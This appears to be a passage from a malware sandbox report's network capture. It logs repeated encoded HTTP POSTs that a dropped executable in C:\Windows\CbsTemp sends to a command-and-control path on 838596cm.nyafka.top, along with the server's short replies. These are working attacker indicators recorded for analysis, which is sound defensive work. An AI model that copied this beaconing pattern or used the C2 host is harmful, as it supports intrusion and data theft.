                                                                                                          Data Ascii: PQ[WY]SY^_WTVYY\WRXSPTV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#< '0:Z)[)/B#?.1)!'(2<2_*?' -/_:?#_&'P-
                                                                                                          Jan 8, 2025 17:13:13.374701023 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:13.616961956 CET811INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:13 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAL4ip90XGq%2BUxEi0ha%2FLA2JJX0bsnHT6ciYA3Pr3kYJNMYh4f%2Boaz1svW7C%2BXIz3s1O2xef0pmIsw98DZjUllL8Vt2yRnISiqNLLKJORgy%2FV8bQCmKZIt1mZ7cRiBk1%2FKKRuwVd"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed793e4d5b0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2244&min_rtt=1724&rtt_var=1686&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=248130&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.549962104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:13.768682957 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:14.113749027 CET2532OUTData Raw: 50 51 5e 57 59 5c 53 5b 5e 5f 57 54 56 5a 59 5d 57 54 58 5b 50 59 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^WY\S[^_WTVZY]WTX[PYVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +(?'3^*6/*>*8=';>P)"?Y>Y#6\.?#_&'P-7
                                                                                                          Jan 8, 2025 17:13:14.241391897 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:14.479101896 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:14 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcYV%2FMLdD9grOwvAjX76v7JHS1P773UCN4mjV3D3ab6QO0WDyAeNEPDMFfJBZZEXmo4YUOSt4O7ai%2FOohcFz196mdIJbVROYECfHAs%2BzCnzNcZcczXQxXRMJT6MKbo7X0299kRL9"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7943baca729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4195&min_rtt=2074&rtt_var=5019&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=76672&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.549968104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:14.610807896 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:14.958231926 CET2532OUTData Raw: 55 50 5e 52 59 5d 56 5b 5e 5f 57 54 56 5b 59 53 57 52 58 59 50 5f 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP^RY]V[^_WTV[YSWRXYP_V^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?+#X'1)/)=5[);5$]%?2((?+">#Y.#_&'P-3


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.549969104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:15.012082100 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1816
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:15.364013910 CET1816OUTData Raw: 55 57 5e 54 59 5e 53 5f 5e 5f 57 54 56 5e 59 52 57 56 58 5e 50 5c 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW^TY^S_^_WTV^YRWVX^P\VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^(^4$#*==1X,3Z*&>;X3.<\*Y ]"79#_&'P-
                                                                                                          Jan 8, 2025 17:13:15.466000080 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:15.832381010 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:15.832401037 CET961INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:15 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fULDEjzTOHsGdfD59nUujAO9wHBtJnf%2Bu%2FTRt5I5yLH80NJTFvawv3%2FWaJKfpfp%2FjZPjil1DkLVaaGtZpDdDaDGZlL%2Fps8l51ZgmaDimr0yhLN6egrloTZPO4vFknG8bC%2BZ%2FOGva"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed794b5cf7729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4871&min_rtt=2024&rtt_var=6454&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2165&delivery_rate=58856&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 56 25 3d 3c 1d 23 15 31 54 2b 3a 2c 02 3d 0d 31 07 39 07 02 5d 27 34 24 14 31 05 3c 5c 22 3f 3d 5e 3f 38 31 10 27 08 3b 08 28 3b 20 5c 04 1f 24 16 2b 3b 2d 1f 2a 2c 2a 59 27 23 0c 05 32 1d 05 00 25 04 30 00 26 2a 39 0f 20 17 27 57 2f 1d 32 18 3a 01 20 13 3c 19 24 5b 27 3e 2f 50 0f 10 38 50 39 3a 3c 04 22 21 3d 0f 35 0d 23 5b 34 0b 0a 12 2a 2d 3b 18 22 3f 3e 02 25 33 32 0b 37 1c 09 1f 30 33 28 03 3c 57 3c 1e 28 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$V%=<#1T+:,=19]'4$1<\"?=^?81';(; \$+;-*,*Y'#2%0&*9 'W/2: <$['>/P8P9:<"!=5#[4*-;"?>%32703(<W<($U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.549971104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:15.290920019 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:15.645067930 CET2532OUTData Raw: 55 50 5e 57 59 5c 56 5a 5e 5f 57 54 56 5a 59 52 57 5e 58 58 50 54 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP^WY\VZ^_WTVZYRW^XXPTVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X+($3"X*.%.$+]=>>=[3;>Q?2$=/<!=8-#_&'P-7
                                                                                                          Jan 8, 2025 17:13:15.832452059 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:15.958494902 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:16.092571974 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qMqbLtnb1timkr0KUN58P%2BZc2AkHhLF8%2BND5FTb4rBXmoipned8VbNrKB0m15mB200xtA9BQr4bhGBTd9vdX1jYM%2FlHFy9dTh3jAM5nz9rEe4Lb7njb7Fq%2FXXGc01w0kcDTuGzrK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed794d1b3ac34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2909&min_rtt=1469&rtt_var=3432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=112359&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.549976104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:16.270797014 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:16.633439064 CET2532OUTData Raw: 50 52 5b 57 5c 5a 56 5b 5e 5f 57 54 56 57 59 59 57 57 58 5d 50 5e 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[W\ZV[^_WTVWYYWWX]P^V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z(+('X?=\,'#Y=.>:3;W<#(/8X!.',/#_&'P-
                                                                                                          Jan 8, 2025 17:13:16.726809025 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:16.959634066 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2fHwkFfUSM1sGkm9lOiM9dsNUsiBUH41GPSCR6ELQRo4AVIa2bXb1mw08Y%2BUp1HskZazB8caJCcUdR6TD%2FTdGMWh9U6YUUuKCNvyluYzwlAQaqgy48pI51UBC7T%2F0PGicK8ahTo"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79533ea7424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1596&rtt_var=873&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=541743&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.549982104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:17.108274937 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:17.458108902 CET2532OUTData Raw: 50 52 5e 50 59 50 56 52 5e 5f 57 54 56 56 59 5a 57 54 58 5a 50 5f 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR^PYPVR^_WTVVYZWTXZP_V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+<'0:[=Y//\>-&)"3+?2*/["=(-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:17.585133076 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:17.825237989 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:17 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NpWMJzUrDScetl9qNxTcObeFFeG2EdgO9EDB19Bs5d2LB7qTa0X9q8TQaciwyPeiBOEiJFfdeXGsOoJgAOt2CkdmrvlJkASBzCo%2FypYTo%2BvDyyeAsLwAz6xyyUAaATymNB4Ziw4"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed795898f6c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2973&min_rtt=1479&rtt_var=3544&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=108663&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.549987104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:17.969945908 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:18.317080975 CET2532OUTData Raw: 55 50 5b 53 59 5b 53 5e 5e 5f 57 54 56 5c 59 5a 57 5f 58 5b 50 58 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP[SY[S^^_WTV\YZW_X[PXV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+(<%#&Z=[9,0?>>;5X&+9(18=3!-,?#_&'P-/
                                                                                                          Jan 8, 2025 17:13:18.433146000 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:18.667149067 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:18 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=isVYvlaP6wE%2FCm356SwRGv0K4aI9E9fggeuPXHvxkXsriQaOlTgsqXvCdbxeuQqYH2Jx3v9dAIGDqo6IF9iCc99yj7Io3mu7JIL3tmQMgUVh9XoQjUP%2F7ClSv83rE3dhz8ZGpJn%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed795decc20f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3020&min_rtt=1698&rtt_var=3281&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=118911&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.549991104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:19.026463985 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:19.379642010 CET2528OUTData Raw: 50 56 5e 50 59 51 56 5d 5e 5f 57 54 56 5e 59 5c 57 55 58 5a 50 58 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^PYQV]^_WTV^Y\WUXZPXV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+(Y'#=-.$+[>>)+*&;)++)0\ =9/#_&'P-?
                                                                                                          Jan 8, 2025 17:13:19.478420019 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:19.717489004 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:19 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBmM2fsn8k1qO04SMqAzVyRcro7RfqyrSSJktmixwVnp9H1I1y2Wov%2FZQKQ7SAzmDFTLL%2BiCM5W%2FOh1yyZ%2BtxkWcGgq0wTAEGg7NHdxKjFZi0BuxcsBNa72h4tkmgTo72ss8ZcpI"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7964783b424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2874&min_rtt=1601&rtt_var=3147&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=123865&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.549999104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:19.859055996 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:20.208302975 CET2532OUTData Raw: 55 57 5b 50 59 5b 56 59 5e 5f 57 54 56 5b 59 5b 57 54 58 5a 50 5d 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW[PY[VY^_WTV[Y[WTXZP]VY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+^7$#==.5Y.'/Y>9\>;5X&8-<1'Y),4\ .'_.?#_&'P-3
                                                                                                          Jan 8, 2025 17:13:20.331048965 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:20.584453106 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:20 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
